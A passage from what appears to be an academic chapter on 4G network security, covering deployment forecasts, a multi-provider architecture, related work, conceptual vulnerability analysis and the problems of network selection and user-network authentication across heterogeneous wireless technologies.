At the other end, personal communications are being rapidly developed using short-range radios. These need to be considered for the next generation communications because their rapid development is a fact (Raychaudhuri, 2002). The existing personal area networks (PAN) and LAN technologies are often used for device-to-device data transfers but can easily do more than that. Wireless headphones, handsets, and PDAs can already build personal networks capable of data and voice transport. In the home area or in vehicles (e.g., personal cars), this can be extended to LAN-like communications. The aim here is to give users access to their data independently of the device currently in use. So, handsets can be asked to dial numbers stored in the home PC and to direct the voice flow to the wireless headphones. Wireless sensors are already available, for example, for outdoor weather condition measurements. Wireless sensors are used more and more in cars. They are also expected to be further developed for home users (intelligent home). This underlines the increasing part of the machine-to-machine (M2M) and network-to-network (N2N) communications in the future communications landscape.


The obviously challenging scenario is to provide users with a bidirectional communications possibility to their personal Intranets independently of their location (anywhere), thus combining the two topics discussed previously. These WAN/MAN/LAN/PAN spanning communication sessions have to be secure, reliable, and economically reasonable. Also, communications become ubiquitous. The used technology needs to be able to reply to this challenge, providing the best available connection anytime, any place. Existing standards do not allow for this usage.

However, it is not a matter of contention between these existing standards. They are more and more understood as complementary. Indeed, the WLANs can easily provide a true LAN experience in limited areas at a low cost while 3G RANs are designed to provide true mobility, quality of service, and vast coverage. The idea to try to integrate both technologies is thus straightforward.

Taking into account the previously observed cycles and the current delays, we could try to compile a prognosis on the B3G and 4G development in the next decade. The current situation and our forecast are illustrated in Table 2.

The convergence between the different infrastructures will start because of the economic and technological limits of the used technologies. Big telcos will try to reduce their service cost by integrating alternative transmission technologies as radio access networks (RAN) into their 3G infrastructure (e.g., UMA-like). However, this integration will still be much more complicated and costly than a new deployment possible for a small wireless Internet service provider (WISP). At the same time, the small WISPs will encounter increasing management problems with the growing user base and the user traffic. It will hardly be reasonable to add a 3G infrastructure upon the existing one as the control plane. Given the lack of standardized methods, the alternative infrastructures are thus likely to be managed in a proprietary way, requiring specific access methods. This will produce the demand for standardization.

Because of the true need for mobile broadband data access and the scarce spectrum of 2G, the 3G will be eventually deployed in the business centers of the developed countries despite the currently observed delays. In Europe, this process could be further promoted by governmental policy in some countries planning to partly reimburse some license fees. However, the delays and the high license fee (Van Damme, 2002) have already motivated the development of and the investments in the alternative transmission technologies, for example, IEEE 802.11 and IEEE 802.16.

Table 2. Possible 3G development in the next years

Year        Milestone                                                                                  Cycles
2003        European 3G start                                                                          3G to 4G: 10 years
Until 2005  Different 4G visions and early 4G research projects
2006        3G deployment in all business areas in the developed world
2006        Broad deployment of alternative technologies (from WiFi to WiMax, etc.)
2007        Further deployment, different UMTS updates (HSDPA, HSUPA) and integration of
            alternative technologies in the UMTS infrastructure
2009        Convergence of different 4G views implied by the economic and technological factors
2010        The high popularity of data services shows 3G transport limits and WiMax/WiFi
            management limits (security, mobility, usability, etc.)
2011        Deployment of first B3G (3.5G) systems
2011        Establishment of a 4G forum
2012        Mature technical drafts of 4G systems integrating different technologies
2014        First commercial 4G services


This development, if commercially successful, will lead to a situation with several parallel infrastructures installed in the European centers by 2008-2009. While the 3G infrastructures will be homogeneous, they are likely to remain more expensive. The alternative offerings will be cheaper but are not likely to provide either the same service quality or the same coverage. Because of the required spectrum licenses, the same national-scope operators will own the 3G systems. The alternative technologies are license-free and thus enable a free network deployment. These can be owned by both global big telcos and small local WISPs.

Users will buy newer products equipped with further wireless technologies. Deploying these products at home, users will be interested in accessing the combined service offers. Different devices will be capable of several access methods (e.g., a wireless ADSL router). Users will be incited to open their hotspots for the usage by others. For instance, a major French telecom provider proposes a reimbursement plan for its ADSL users if they provide WLAN access to its cellular customers over such devices. At the same time, alternative technology operators are forming roaming organizations and user communities, aiming for the same results (see WeROAM, Fon communities, etc.).

Meanwhile, the research will push towards unified and concrete B3G and 4G views. To protect the investments, the deployed alternative infrastructures are likely to be given the necessary attention in this development process. The result will likely be a system providing for a convergence between the different technologies.

While the new 4G architecture is being conceived and is maturing technologically, 3.5G systems are likely to appear on the market by 2010 at the latest, filling the gap between LAN-experience and manageable. These updates of the radio link and of the backbone infrastructure could provide the basis for the later expected 4G much in the same manner as GPRS/EDGE (2.5G) have required and accomplished the necessary infrastructural changes for the transition process from 2G to 3G. The commercial and technological convergence and the available B3G systems will provide the drivers for the establishment of an industry group (e.g., 4G forum) that will be given the task of 4G system standard development. Based on the situation and the previously accomplished research, it could produce mature system drafts by 2012 and the first commercial 4G deployments could start about 2014.

Our 4G Vision

Our vision is motivated by the previous work and the ongoing development of the global telecommunications networks, in particular of the Internet. It respects the fact of the proliferation of the Internet technology in all telecommunications branches and is similar to the All-IP approach when used for data transport.

Learning from 2G and 3G experiences, 4G envisages an architecture that allows the maximum possible infrastructure reuse. The idea is to minimize a risky engagement with a particular technology and to guarantee the long-term flexibility for the involved authorities. We believe that the versatility here can provide an enhanced flexibility both technologically and from the business point of view. This ultimately market-driven solution should be capable of providing any service in any manner, restricted solely by the user's demand and not by any technological factors.

From Service-Centric to Data-Centric Approaches, from Technology-Centric to User-Centric Approaches

The classic telecommunications industry approach dominated by the national-scope telecom operators with the well-managed infrastructures currently cannot provide a cost-effective focused access to Internet services. This is particularly true for the developing countries where neither new installations nor massive updates of the existing infrastructure can be afforded.

In its initial collaborative work, the telecommunications industry was much influenced by the dominating demand for the voice telecommunications. The 1G and 2G systems were originally designed to provide one single service: the mobile voice telephony. Their system design was


service-oriented. As a result, the conceived core infrastructure is circuit-oriented and the wireless link's capacity is tailored to the voice-implied bandwidth requirements. Due to these properties, 2G currently provides a reliable voice service; it is however quite difficult to reuse this infrastructure for other purposes. However, deploying a new infrastructure for every service is not scalable and financially impossible. Especially with the modern digital technologies, it is much more efficient to reuse the same infrastructure for different services.

3G development is an example of a network-oriented design process (sometimes also called operator-oriented design). It is a step ahead from the service-oriented design of the 2G system since it explicitly provides for infrastructure reuse for various services. Principally aiming at operators and networks, such design tries to respond to the operator's management requirements. It thus specifies parts of the network core, producing homogeneous technologies comprising everything the operator has requested. According to this design paradigm, the 3G technologies deliver voice and data within the same infrastructure. In presence of an existing voice-oriented 2G infrastructure this renders the only added service—the mobile broadband data—quite expensive in itself. The operators have to amortize the network deployment and the license cost over the new service. Thus, from the user's point of view, this new service is often perceived as too expensive.

To be able to provide cost-effective data services at any chosen place in the world we need more user-oriented and data-centric approaches than what 2G and 3G paradigms deliver. At least in the mid-term, the hope here lies in a more opportunistic approach from the technological point of view. Indeed, the user typically does not care about who provides a particular service and how. The user cares about the availability of services, their performance (throughput, latency, etc.), the quality of service (QoS) (i.e., the performance and the variation of the performance factors), the ease of use, and service prices. Accordingly, the user-oriented design tries to respond to these user wishes, assuring the possibility to freely choose an available service. Choice, as the driving factor for the competition, plays a crucial role in this scope since it results in better and cheaper technology.

From the system's point of view, the resulting overall architecture delivers very different services through completely heterogeneous access networks (ANs). User-oriented design has to cope with the question how to manage the system and how to provide the user services with an expected quality. The management is important because a good management reduces the operational costs. The provision of the expected quality is the main factor for the user satisfaction.

Such an architecture could help to achieve more infrastructural and architectural flexibility, permitting a free technology choice for the local operators and thus, in the final run, reducing the costs and offering more choices for the users. By featuring more flexibility, this step to further diversification gives new opportunities and could help, for example, to reduce the cost or to mitigate some aspects of the digital divide problem.

At the same time, this task is not technologically simple. As could be seen from the previous examples, the service-oriented design approach is a straightforward technological way to conceive a network dedicated to the needs of one single service. Provision of more services within the same infrastructure makes it more difficult to assure that every service individually is provided in a satisfactory way. We can generally allege that the QoS in the multi-services network is more difficult to maintain because very different requirements have to be fulfilled by the same infrastructure. Yet, owing to this common homogeneous infrastructure, with the network-oriented design it is still relatively easy to conceive systems enabling a comprehensive network management. The necessary dynamic infrastructure-to-service adaptation (e.g., for QoS) can then be achieved using the integrated management functions.

The step to the user-oriented design potentially implies a broad diversification of data transport technologies providing different services. Thus, the resulting systems inherit the problems of the dynamic per-service QoS provision. Additionally, we run into difficulties trying to consolidate all

these different technologies and make them do what the operator wants. This applies to the network management in general. In particular, it concerns the mentioned QoS provision problematic and also raises diverse security considerations, both of the operators (infrastructure control and protection, resource usage control, accounting and billing) and of users (data confidentiality, location privacy, flawless billing).

Hence, the user-oriented design opens new possibilities but potentially results in a heterogeneous environment. To be deployed and maintained by the operators, this environment needs to be understandable, manageable, flexible, and secure. To be used, it needs to be user-friendly, reliable, and fair. In particular, users should be able to use different services over different infrastructures in the same, familiar manner.

Thus, we need to develop more flexible infrastructures and more sophisticated mechanisms for infrastructure access incorporating but hiding the whole technological complexity. These mechanisms should provide adaptability to both users and contents. Here we concentrate on heterogeneous network access mechanisms and the necessary corresponding network management functions in the scope of the future integrated environments.

Multi-Provider Network Environment

For 4G, the accent lies on users and the requested services (Pereira, 2000). For flexibility and cost reasons, the 4G architecture has to be able to integrate different technologies to provide services to users. Services are diverse offerings, commercial or free, ranging from a basic connectivity (e.g., to the Internet) to more sophisticated services such as voice calls or instant messaging (IM). To provide more complex services, some providers can use services proposed by other providers.

We see 4G as a potentially open, heterogeneous, user-oriented architecture, consisting of different service and access networks. These networks are operated by different authorities. We call such authorities service providers¹ if access to services is possible over their respective infrastructures or networks. The global 4G architecture is shown in Figure 2. It is composed of a panoply of service provider networks (SPNs) connected by an IP-based core network for any global data exchanges. SPNs principally support different wireless ANs. AN technology can range from personal to wide area networks.

Each provider may, but is not required to, have its own users and propose multiple services over different ANs. Users are defined as logical system identities subject to the service contract between two legal bodies, one representing the provider and the other representing the served user. This definition implies that every user corresponds to a service contract with exactly one provider.² Note that this contract requirement does not imply any price models or restrictions. Since every user corresponds to one legal body, we use these terms interchangeably in the rest of the document unless explicitly distinguished.

The service contract provides the trust relationship and the set of authorizations. From the user's point of view, the provider from the corresponding service contract is called the home provider. If a user uses a provider only for user identification, authorization, and billing services, we call this provider a virtual operator³ (Zhang, Li, Weinstein, & Tu, 2002). Virtual operators (VOs) can but do not need to have their own infrastructures. Typical VOs are, for example, 2G or 3G providers (because of their existent user database), miscellaneous resellers, but also credit card issuers, banks, public remote authentication services, and so forth.⁴

Providers may (but are not required to) serve users for whom they are not home providers. Providers may propose access to services in their own and in other infrastructures (e.g., in the Internet or in the user's home network). The necessary network interconnection can be based upon private infrastructure interconnections of several providers or it can be based on a public backbone like the Internet. This and other definitions, for example, service level agreements, price agreements, mutual agreements on user authorization in visited networks, and so forth are subjects of so-called roaming agreements signed between the legal bodies representing the providers. Using these roaming agreements, providers can verify identities and profiles of visiting users whom we call visitors.


Security in 4G

Figure 2. Global system architecture

[Figure 2 (diagram, not reproduced): service provider networks SPN A to SPN D, built on 2G/GSM, 3G/UMTS, WLAN or LAN, and PSTN access, each with its own PDP and PEPs, interconnected over an IP backbone. Legend: data traffic, control traffic, PEP, PDP; SPN C stands for Service Provider Network C.]

The users who do not have any verifiable service contracts may be treated as guests. Guests are users with special authorizations (profiles), locally and freely defined by any operator. These are thus local users and will not be treated differently in the following.

SPN Organization and Management

Management tasks in the SPN are carried out by the SPN owner, that is, the provider. The actions are based on the management policies that reflect provider and user requirements. For this purpose, providers deploy policy decision points (PDP), that is, logical entities capable of taking completely automated or assisted decisions based on the observed network situation and the defined policy. Policy enforcement points (PEP) are installed in the control equipment to enforce the decisions made. In particular, PEPs are installed in the edge equipment.

SPNs are supposed to be trusted, non-public networks with appropriate protection measures. User traffic is to be strictly separated from the management traffic. The internal communications are IP-based. Inter-SPN management traffic can be protected by IP security (IPsec) (Kent & Atkinson, 1998), or by using dedicated protected links (L2 virtual private network [VPN] services, trusted sub-infrastructures, etc.).

Internal SPN architectures are deliberately left open. The protocols and mechanisms regarding PEP, PDP, measurements, and so forth do not need to be defined at the system level, because this complexity can be hidden within the SPN entity. Our main concern is to define architectures that do not impose any specific solutions. In a heterogeneous 4G system with its different providers (in terms of size, available resources, locality, services, capital, etc.), this is an additional degree of freedom. Different approaches are principally suitable for


management purposes such as proprietary console or Web-based management, SNMP (Case, Fedor, Schoffstall, & Davin, 1990), COPS (Durham et al., 2000), GMPLS, and so forth.

Possible Approaches to 4G

On a high abstraction level, three approaches to 4G are theoretically possible (Varshney & Jain, 2001).

Multimode Devices

Multimode devices (which already exist on the market, e.g., GSM/WiFi phones, PDAs with 802.11 WLAN, Bluetooth and GSM access modules, smartphones with Bluetooth capabilities, etc.) easily expand the effective coverage area, managing the cooperation issues by the installed software. This concept pushes the 4G connection management complexity to the terminals, that is, it does not require any additional complexity in the wireless networks. However, the terminal equipment has to integrate operational logics including not only every technology-specific treatment but also the translation of quite different technological parameters to be able to make decisions. It is not clear if this can be done in an economically reasonable fashion for multiple, very different technologies, in particular taking into account the vertical (in the sense of the ISO/OSI model) complexity of QoS, security, and mobility management.

Overlay Networks

Another possibility is the installation of an overlay network of 4G access points situated above the actually available wireless networks. Note that in this approach the devices will still need to have several network interfaces to be able to access the entire infrastructure. The distinction lies in the additional complexity, which is completely shifted to the overlay. The requirements on the underlying technology are minimal. The overlay has to define the necessary signaling and transport functions. Besides the physical access to the used technology, the wireless device has to implement the overlay access module that will implement 4G signaling, 4G management, 4G security, 4G transport, and so forth functions. An example of such an architecture would be the well-known All-IP approach discussed in the following sections.

Common Access Protocol

The third possibility is to unify the access protocols of the wireless networks, thus enabling users to access the 4G network by some standard means. This possibility implies separation of the transport and the control planes. Further, it is necessary to identify technology-specific functions that are part of the control plane. These functions have to be externalized and reflected by an abstraction layer/abstraction application program interface (API) that could then implement this common access protocol.

Note that this list is exhaustive (meaning that there are no other possible approaches to an integrated 4G system in the sense of the previous section). However, the mentioned alternative approaches are not necessarily mutually exclusive. It is imaginable to have some combinations of these general high-level approaches in a final solution. In the following, we present some of the proposed 4G architectures, classifying these according to the previous scheme.

RELATED WORK

Related Work on 4G Architectures

In Raivio (2001) the author discusses the currently most popular approach to 4G. This approach is based on a common Internet core for different networks, unifying everything over IP and the related Internet Engineering Task Force (IETF) technologies. With respect to this so-called All-IP (sometimes Full-IP) approach, the author briefly discusses the possibilities and the deficiencies of the concerned IETF protocols including the authentication, authorization, and accounting framework (AAA), Mobile IP, IPv6, IPsec, and SIP. The author points out that this approach is straightforward but also problematic in terms of QoS, security, and mobility management.


The presented All-IP idea is the current state-of-the-art approach in the high-level 4G research. In the classification given in the previous section, All-IP represents an overlay network approach. The IP network is used as an overlay that integrates different technologies. IP technologies are used for both control and transport planes. IP base stations are used as access points in that 4G vision.

In Otsu, Okajima, Umeda, and Yamao (2001) the authors research a possible core network design for 4G systems. Describing the current situation of the telecommunications and the predominance of IP-based applications, they give an outlook on estimated traffic in the future generation of wireless systems. Then they discuss possible wireless transmission characteristics in terms of transmission bit rate, spectrum, area coverage, and hierarchical service area and define such network requirements as seamless connections, reduction in the number of control messages, short delay at handover, reduction of cost per bit, service integration based on IP, and movable network support. The network architecture is then defined as a core network (CN) connecting different ANs like a future, yet-to-be-defined 4G-RAN, and already existing WLAN, 3G, and PSTN to the Internet. CN and 4G-RAN are completely IP-based. The terminals have IP addresses assigned. The CN is directly connected to 4G-RANs and the Internet and uses gateways to connect to the public switched telephone network (PSTN) and 3G. Mobility management is done by using the hierarchical Mobile IPv6 approach. Additionally, the article discusses some issues in the 4G-RAN configuration. In other words, this proposal is an instantiation of the All-IP approach.

Another All-IP proposal is discussed in Yumiba, Imai, and Yabusaki (2001). The recognized requirements here are huge (IP-multimedia) traffic handling, advanced mobility management (MM), diversified radio access support, seamless service, and application service support. The authors then discuss possible solutions for MM and seamless services and name Mobile IP, Cellular IP, and similar techniques. However, they recognize the deficiencies of such systems since they are hardly suited to provide a mobility management of the same quality as is the case in 3G. The authors claim that the networks beyond IMT-2000⁵ should be much more location-registration oriented and should identify the location registration management as a study topic. For instance, hierarchical or concatenated location registration techniques have to be studied. Then they discuss handover issues, distinguishing local handovers and overall network handovers, and identify this feature as a further study object.

Trying to provide an infrastructure-independent access to services and applications for highly mobile users, Kellerer, Vögel, and Steinberg (2002) present a solution based on a communication gateway. Originally driven by an automobile environment, the basic idea is to install an intermediate element between the actual user equipment and the serving networks. From the network point of view, such a communication gateway thus resides within the end-system. Including caching and switching units, the gateway provides a general middleware interface to the applications. Thus, this approach pushes the intelligence towards the end-systems, trying to map user requests at their origin to available networks and services. In our classification, this proposal represents the multimode device approach.

Becchetti, Priscoli, Inzerilli, Mähönen, and Muñoz (2001) take a slightly different approach. Mainly dealing with QoS support over different wireless infrastructures, they define a new intermediate layer between the IP and the second layers. This wireless application layer (WAL) then provides a QoS-generic interface for IP featuring uniform guaranteed link reliability and traffic control. The position of WAL in the ISO/OSI model implies a hop-by-hop QoS agreement logic. The details on the modular architecture of WAL, its class- and association-based QoS provision, and the Snoop TCP method to avoid congestion in the TCP layer can be found in the paper. In our classification this proposal is an overlay proposal since WAL instances have to be integrated in the terminals and in the access points. IP is used as a general transport in the All-IP manner, but the technological heterogeneity is hidden within the WAL, which acts as a convergence sub-layer. WAL


instances rely on SNMP to build the necessary decision bases and so forth.

Related Work on 4G Security

The user verification and network access in different heterogeneous environments represents one of the major 4G problems. This is discussed later in detail. One of the problems is the access protocol, but there are also some open questions concerning the back-end trust architectures and multi-domain, multi-party AAA.

An interesting related work seems to be Zhang et al. (2002). Introducing the concept of a so-called virtual operator, the authors describe how an authentication service reachable over the Internet could authenticate its users in a foreign hot spot environment using AAA. As potential virtual operators the authors see ISPs, content providers, cellular operators, or pre-paid card issuers. To reduce the number of necessary trust relationships between potentially numerous hot spot operators and diverse virtual operators, the authors propose a commonly trusted broker entity.

IETF currently works on the protocol for carrying authentication for network access (Forsberg, Ohba, Patil, Tschofenig, & Yegin, 2003) in its PANA working group. PANA specifies an architecture very similar to the IEEE 802.1X architecture used in this work for LAN/WLAN access. PANA is link layer agnostic, transporting authentication information between the PANA client and the PANA authentication agent at higher layers. Since it is principally capable of identifying users, PANA could thus be used as a common access protocol to heterogeneous networks. However, since PANA has to access a higher level element, the L2 mostly remains unprotected. Also, after the (unprotected) L2 establishment, the local PANA client needs to discover its network's pendant, the PANA authentication agent (PAA). This involves discovery broadcasts and round trips. PANA here nicely illustrates the problems inherent to higher layer network access: questionable security, holes in the access controllers, broadcasting in the access phase, and high network access latency.

Besides, PANA does not optimally support mobility: without additional mechanisms, the authentication has to be completely restarted at the next visited PAA (even within the same network). Such mechanisms could be an L3 (i.e., in the 4G scope typically IP) context transfer protocol that would allow arbitrary context transfers between PAAs. IETF will shortly publish its context transfer protocol (CTP) specification (Nakhjiri, Perkins, & Koodli, 2004) as an experimental standard. However, the payload formats for CTP have to be specified too.

The work on the public access wireless networks (PAWNs) can be interesting in the 4G scope since it has to practically resolve several problems very similar to the anticipated 4G problems. PAWNs are typically implemented with IEEE 802.11 technology. Since the integrated 802.11 mechanisms are insufficient for almost all typical PAWN areas (per-user quality of service, system-wide mobility, security, user network access, etc.), the solutions proposed for PAWNs are typically completely decoupled from the underlying technology. Hence, the practical experiences gained in such installations are of tremendous importance for the 4G research.

An approach for WLAN hot spots providing a secure wireless Internet access in public places is Microsoft's CHOICE (Bahl, Balachandran, & Venkatachary, 2001). The authors build a network that globally authenticates users and then securely connects them to the Internet via a serving 802.11 WLAN. A reasonable argumentation against IPsec for this purpose can be found in the publication. Introducing a new software module (PANS) instead of IPsec, the architecture promises authorization, access control, privacy, security, last hop quality of service, and accounting. However, this software (responsible for packet marking on mobile hosts) has to be installed on all mobile terminals, effectively modifying protocol stacks. The WLAN itself is open but does not allow any connections to any other networks, except for HTTPS connections to the global authenticator (global MS Passport service) and HTTP to the local Web server where, for example, the software module can be downloaded. The network's PANS authorizer module obtains key information from the global authenticator after successful user authentication. The authorizer can also install all required policies.


It then reroutes the traffic to a PANS verifier. The latter actively processes every packet, checking the mark/tag added by the PANS module running on the mobile and providing, for example, per-user access control and accounting.

Mobility support for public WLANs is presented in Friday et al. (2001). Using a similar packet tagging approach as in CHOICE, the authors describe their GUIDE/GUIDE II systems. Originally meant for a metropolitan scale access using modified client protocol stacks, GUIDE offers ordinary citizens secure and accountable Internet access over the deployed 802.11 WLAN infrastructure. GUIDE II adds handover management using Mobile IPv6. IPv6 datagrams are tagged by clients using the modified Mobile IPv6 stack. Programmable access routers ensure that only packets containing valid access tokens get to the trusted core network. Over an access router, users authenticate at an AAA authentication server. The latter distributes session keys to the access router group and the mobile terminal. User payload encryption is optionally possible between the router and the user equipment.

4G SECURITY REQUIREMENTS

4G security measures have to provide protection for 4G users and 4G providers.

There is no particular and evident reason why 4G security could be easier to achieve than 3G or 2G security. On the contrary, there are several reasons why it could indeed be more difficult, some of which are discussed in the 4G Vulnerabilities section. One of the obvious reasons is the heterogeneity of the 4G system. Other reasons are provider inequality and the envisioned connection ubiquity.

Main security considerations in our 4G vision refer to the open system interfaces. One of the security targets is thus the provider-provider interface. However, the most important and 4G-characteristic target is the user-network interface (including the user-service interface⁶). In the following sections we discuss these topics, specifically dealing with the user-network interface.

Important, but not necessarily new, security provisions must be considered in the internal provider network organization. The latter point is not discussed in the following.

4G VULNERABILITIES

Vulnerabilities of Wireless Networks

Wireless networks are generally more vulnerable than their wired equivalents. Wireless security is a difficult problem that has to take into account the vulnerable medium per se (unclear network perimeter, shared medium, naturally broadcast, invisible/virtual network access), performance (security overhead, group communications), limited handset capabilities (human-machine interface, CPU, and memory), battery constraints (sleep management, on/off behavior), and different user services (roaming, mobility, localization). These problems have been discussed in this work per wireless technology (Hecker, 2005).

Heterogeneity adds a new dimension to this discussion. It multiplies the number of available mechanisms and, from the point of view of an attacker, caters to more opportunities to attack the overall system (weakest link). New attack scenarios are conceivable: an attacker could use a weakness within one access network and the systemic interdependencies to gain access to another access network. Terminals can be attacked over several available interfaces at the same time. The services have to be provided over several interfaces, thus resulting in tighter performance constraints and complexity. A typical example is a handover between two different technologies (called vertical handover), but the same has to be considered for sleep management (paging) and generally for signaling.

Vulnerabilities of Service Provider Networks

A 4G system encompassing different technologies has to support complex management mechanisms (control systems, signaling, etc.), which considerably add to the system complexity and thus represent a major vulnerability per se. This is especially true for a multi-provider and thus multi-authority


environment where a mutual preliminary user-network trust does not necessarily exist and must be established by some means (typically involving management subsystems and signaling before the user identity can be verified).

The serving network protection is one of the critical points to ensure service continuity and investment in new infrastructures. From the secure mobility discussions (such as Mobile IP security), we know that visited networks are often overexposed to resource consumption and denial of service. In our 4G vision, an SPN has to be protected from the users on the user-network interface and from the outer world on its backbone interface(s), including protection from other providers.

User Vulnerabilities

As a wireless user is vulnerable to unauthorized data access, traps/impostors, and disinformation, the user must be protected from abuse by third parties and from the part of the serving SPNs. Given a rising part of the M2M communications and the wish for infrastructureless communications, the user device is also vulnerable to attacks by other devices involved in the provision of the consumed services (impostors, data modifications, data sniffing, man-in-the-middle) and by devices consuming services provided by the user device (denial of service, abuse).

Connected to multiple interfaces over several providers, the device is naturally multi-homed. It is potentially exposed to all attacks over the established connections, including malicious code intrusion (viruses, spyware, and worms).

User vulnerability includes headset vulnerability. A typical 4G headset featuring several active interfaces is naturally exposed to different kinds of attacks, such as attacks on device drivers of the communication interfaces, attacks against the transport and signaling communication stacks, and attacks against all services potentially provided or assisted by the headset itself (e.g., file sharing, localization, auto-update). An important and often forgotten point is device theft. Today, mobile devices are trendy and, having a rich and versatile feature set, can be quite expensive. They have become an important accessory and manufacturers are doing their best to render them more portable and more powerful at the same time. It is obvious that these devices have become an interesting target for thieves. Thus, physical device security is an important but insufficient subject. Mobile handsets can store important personal user data (address books, access codes, professional data, personal medical information). Remote device deactivation, blocking, and erasure seem important future security features.

A 4G user needs a particular protection to ensure his/her anonymity and an offer-consistent and verifiable billing. Without any protection, in an international multi-provider 4G environment, a user can be an easy target for both price fraud (charging wrong prices, charging incorrect usage) and user tracking.

Heterogeneous Security

Current wireless technologies have different security considerations and provide corresponding security definitions in the standards. The latter are naturally dedicated to the respective link layer and thus concentrate on the implementation within the network interface cards, adapters, and so forth. In 4G, different link layer technologies are likely to coexist for the reasons explained in the previous sections. Also, the focus changes: in personal communications the security focus should be on users, not on network devices.

The problem with the characteristic 4G security is twofold. On the one hand, there are very basic open questions that have to be answered by the ongoing research by weighing practical constraints against the required security level. What is security in 4G if we do not know what 4G looks like, what services it is supposed to provide, and in which environments it is going to operate? The system architecture is crucial for the security considerations. Additionally, we need trust and threat models. What are the capabilities of potential attackers? Which ANs will be used and how? Trust models should correspond to the probable usage scenarios. For instance, if users are not "owned" by providers (Pereira, 2000), how can


trust be established and to whom? With all that, a consistent security policy has to be defined along with the security architecture, identifying technology-independent subjects, objects, relationships, authorizations, threats, and protective measures. This is however difficult and defines a problem known as heterogeneous security.

On the other hand, there are practical problems concerning the technical applicability of solutions. The security solutions proposed by the wireless technologies are limited to the identified needs. They are thus different from technology to technology, reflecting its expected usage. Very often, they fail to fulfill the security requirements, typically because of conceptual or implementational flaws. But even if their implementation is correct, their scope is naturally wrong: as access security, they aim to provide link security, but ultimately providers need service access security and users need personal data security.

How can the defined security policy for the entire system be applied and enforced to all system entities given that the available solutions are different, potentially flawed, and limited to system parts? For instance, if the security policy identifies link encryption as a necessary confidentiality implementation, how can this be universally activated and with which keys and properties? How can we guarantee an adequate, comparable strength of the different encryption mechanisms? What to do with the technologies that do not provide link encryption? The security policy must consider these cases and provide answers to such questions.

4G Security Layer

The aforementioned practical problems with the 4G security can be avoided if the technology-dependent security measures are not used. Instead, all security measures could be applied in the overlaid technology. However, it is often insecure or at least inefficient to enforce security in the overlay. For example, 2G/3G network providers rely on L2 security measures for network access control, frame integrity, and link encryption. While the link encryption is not important for the provider, the access control is primordial for infrastructure protection and revenue guarantees. Moreover, the L2 security measures are often implemented in the network interface hardware. Their design includes power consumption and computational resource considerations. A higher level solution would be implemented in the device control logics, that is, typically software. Given the constraints with the 4G terminals (wireless security processing gap), it would be wise to use the hardwired security solutions in the network adapter. Furthermore, in the OSI logic, multiple links could lie between the user and the used L3 device (router), but only one link is possible between the user and any used L2 device. Thus, the L2 security measures are guaranteed to be implemented in the first network entity (the access device), that is, next to the user, at the very edge of the network. That brings the security as close to the user as possible and thus guarantees physical infrastructure protection. Moreover, it potentially scales better since the access devices are designed to support a fixed number of connections, including the connection properties to be enforced. Another point is that higher level security solutions cannot achieve the same user privacy. For instance, user location privacy is in danger since lower layer addresses (such as world-wide unique MAC addresses) cannot be hidden by higher layer security measures.⁷

For reasons stated previously, we think that L2 security is indispensable in 4G. This is by the way also the most characteristic point of 4G: whatever the 4G vision, everybody seems to agree that 4G will be technology-opportunistic, incorporating different wireless ANs in one system. The network access security is thus one of the major challenges, typical and characteristic for 4G.

NETWORK ACCESS SECURITY

A particular security problem is bound to the user network access. The 4G user has a terminal with multiple network interfaces. The security measures for each interface have been designed according to an initial security analysis during the technology standardization phase. Since the technologies are meant for different purposes, the risks and the defined security functions are likely to be different.


The security mechanisms are definitely different. Thus, every interface has different requirements on credentials in terms of identities, expiration policies, initial trust representation, and so forth. These requirements have to be fulfilled since otherwise the interface could be unusable or the access by the means of this interface impossible. If the user definition in the system is consistent, then the 4G user cannot be expected to use multiple identities: in 4G, every network provider needs to be able to identify any given user correctly, in particular in the different ANs, which the user might be using simultaneously. That is important for the authorizations defined in the security policy. It is equally an important requirement for a consistent billing.

Network access can thus be divided into various sub-problems that are treated in more detail in the following.

Network Selection

In the outlined 4G vision, a free service choice is an important design criterion. To provide that choice, users must be able to collect information on the ANs of all available providers. Most importantly, this is required for the decision of which network the user should connect to. For instance, it cannot be generally assumed that every network is accessible for every user (e.g., because the user's home provider does not have any roaming agreement with the provider of the detected network).

Network selection is a problem since some preliminary network access is necessary prior to authentication, which however should be limited so as not to contradict the security policy. Network selection thus represents a security-usability compromise.

In a dynamic multi-provider multi-technology 4G environment, active exchanges (through signaling, like network discovery) are necessary since the existence of system-wide coherent network identifiers cannot be relied upon. These network identifiers have very different meanings in different technologies. For instance, if a 2G provider wants to deploy a supplementary data service over 802.11 WLANs, what should be used as a network identifier? There is no regulation on service set identification (SSID) naming in the 802.11 WLANs. Besides, in a dynamic 4G environment with the very different proposed services, over different technologies and with different prices, it is difficult to believe that a network identifier alone is a sufficient base for a reasonable network selection decision.

In a user-centric environment, the network selection decision should be made based on physically available networks and channel qualities, user identity and user service authorizations within the encountered networks, and on offered service prices. Especially price display for a given user appears as one of the critical issues in a multi-provider environment characterized by continuous roaming between several different (big/small, national/local, etc.) providers. Indeed, even in 2G with a typical limitation to a handful of providers per location (2-8), users traveling to foreign countries have been known to feel badly informed about pricing of outgoing and incoming calls. In 4G with multiple-interface terminals and possibly new business models, several providers can be used at the same time, possibly offering similar services at prices depending on dynamic factors such as current network usage (per-session price determination).

The involvement in such rather complex pre-authenticated (Hecker & Labiod, 2004) user-network signaling represents major risks for both network operators (infrastructure intelligence, unpaid resource consumption, denial of service) and users (localization, tracking). Additionally, optimizations are necessary to that recurrent process, which in 4G can be repeated in-session, since it can have an important impact on mobility performance (vertical handover).

User-Network Authentication

A user-network authentication is necessary from the network provider's point of view to be able to enforce a reliable access control to its resources and to authorize requested service sessions in its infrastructure or at least a transport (connectivity service) over its infrastructure. It is also required by the user's home provider for authorization and billing.


Security in 4G

From the user’s point of view, network authentication permits to verify the received network identity information, guarantees access to the correct environment, and thus permits to establish trust in the serving provider. It helps to eliminate impostors and to protect against man-in-the-middle attacks.

After the service information collection, some networks can be eliminated by policy or user wishes (e.g., a pre-configuration of the type “never use provider X” or rules like “always choose the cheapest available service”, etc.). Now, the user can actually access the required services over the available networks. A reliable user-network authentication is required at this moment at the latest.

The L2 user-network authentication is a problem in 4G since the logical and technological requirements are very different from technology to technology. We illustrate this on an arbitrary example, comparing UMTS and standard 802.11 security.

UMTS uses an external module (USIM) that hides the actual authentication method from the used device and the visited network. The authenticated logical entities are the USIM and the visited network, represented by the authentication center (AuC). The USIM is supposed to grant network access to the device (i.e., also to the user). The USIM is capable of key derivation after a successful authentication.

